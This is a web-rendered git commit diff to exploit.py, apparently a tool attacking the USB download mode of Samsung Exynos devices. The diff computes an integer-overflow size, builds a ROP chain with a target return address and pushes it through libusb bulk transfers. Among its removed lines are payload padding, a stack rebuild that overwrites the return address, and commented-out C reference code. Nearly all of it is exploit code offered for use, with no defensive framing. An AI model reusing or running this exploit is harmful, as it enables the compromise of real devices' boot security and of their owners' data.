removed static code
This commit is contained in:
parent
ead9a8a197
commit
d7a740d173
71
exploit.py
71
exploit.py
@ -94,6 +94,7 @@ class ExynosDevice():
|
|||||||
|
|
||||||
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
||||||
max_payload_size = 0x100000000 - size_to_overflow
|
max_payload_size = 0x100000000 - size_to_overflow
|
||||||
|
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
|
||||||
|
|
||||||
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
|
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
|
||||||
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
|
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
|
||||||
@ -133,11 +134,8 @@ class ExynosDevice():
|
|||||||
cnt += 1
|
cnt += 1
|
||||||
print(f"{cnt} {hex(current_offset)}")
|
print(f"{cnt} {hex(current_offset)}")
|
||||||
|
|
||||||
rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
# Build ROP chain.
|
||||||
# p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
|
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||||
# rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
|
|
||||||
# rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
|
|
||||||
# Should
|
|
||||||
transferred = ctypes.c_int(0)
|
transferred = ctypes.c_int(0)
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
||||||
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
|
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
|
||||||
@ -146,70 +144,7 @@ class ExynosDevice():
|
|||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
|
||||||
|
|
||||||
|
|
||||||
padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]
|
|
||||||
padding_size -= len(payload)
|
|
||||||
|
|
||||||
|
|
||||||
# Construct payload, we can only overflow with 1 transfer.
|
|
||||||
dl_buf_current = DL_BUFFER_START
|
|
||||||
|
|
||||||
if len(payload) > MAX_PAYLOAD_SIZE:
|
|
||||||
print("payload too big!")
|
|
||||||
return
|
|
||||||
|
|
||||||
payload = payload + ((MAX_PAYLOAD_SIZE - len(payload)) * b"\xcc")
|
|
||||||
payload = struct.pack("<II", 0, MAX_PAYLOAD_SIZE) + \
|
|
||||||
payload + struct.pack("H", 0)
|
|
||||||
|
|
||||||
assert (len(payload) == BLOCK_SIZE)
|
|
||||||
|
|
||||||
|
|
||||||
# while True:
|
|
||||||
# print(".", end="")
|
|
||||||
# self.write(b"")
|
|
||||||
|
|
||||||
|
|
||||||
padding_size = TARGET_OFFSETS[self.target][1] - \
|
|
||||||
TARGET_OFFSETS[self.target][0]
|
|
||||||
|
|
||||||
padding_size -= MAX_PAYLOAD_SIZE
|
|
||||||
padding_size += 8
|
|
||||||
|
|
||||||
chunk_cnt = padding_size // CHUNK_SIZE
|
|
||||||
padding_size = padding_size % CHUNK_SIZE
|
|
||||||
block_cnt = padding_size // BLOCK_SIZE
|
|
||||||
padding_size = padding_size % BLOCK_SIZE
|
|
||||||
|
|
||||||
if (padding_size == 0 and block_cnt > 0):
|
|
||||||
block_cnt -= 1
|
|
||||||
padding_size = BLOCK_SIZE
|
|
||||||
|
|
||||||
|
|
||||||
ram_size = padding_size + 4 + 2
|
|
||||||
|
|
||||||
# # Reconstruct stack
|
|
||||||
ram = b"\xcc" * ram_size
|
|
||||||
ram = ram[:padding_size] + p32(TARGET_OFFSETS[self.target][0]) + ram[padding_size + 4:]
|
|
||||||
|
|
||||||
# *(uint32_t*)&ram[padding_size] = targets[target_id][XFER_BUFFER];//overwriting return address in stack :]
|
|
||||||
payload_size = len(payload) + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size
|
|
||||||
pass
|
pass
|
||||||
# payload->size = original_payload_size + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size;
|
|
||||||
# dprint("malicious payload->size=0x%x\n", payload->size);
|
|
||||||
|
|
||||||
# uint32_t min_size_to_overflw = (uint32_t)0 - targets[target_id][XFER_BUFFER];
|
|
||||||
# dprint("min_size_to_overflw = 0x%x\n", min_size_to_overflw);
|
|
||||||
# if(min_size_to_overflw > payload->size)
|
|
||||||
# printf("ERROR : min_size_to_overflw > payload->size\n");
|
|
||||||
|
|
||||||
# // step 3 : usb communication
|
|
||||||
# printf("- exploit: sending payload...\n");
|
|
||||||
# rc = libusb_bulk_transfer(handle, LIBUSB_ENDPOINT_OUT | 2, (uint8_t*)payload, original_payload_size, &transferred, 0);
|
|
||||||
# if(rc) {
|
|
||||||
# printf("libusb_bulk_transfer LIBUSB_ENDPOINT_OUT: error %d\n", rc);
|
|
||||||
# fprintf(stderr, "Error libusb_bulk_transfer: %s\n", libusb_error_name(rc));
|
|
||||||
# return rc;
|
|
||||||
# }
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user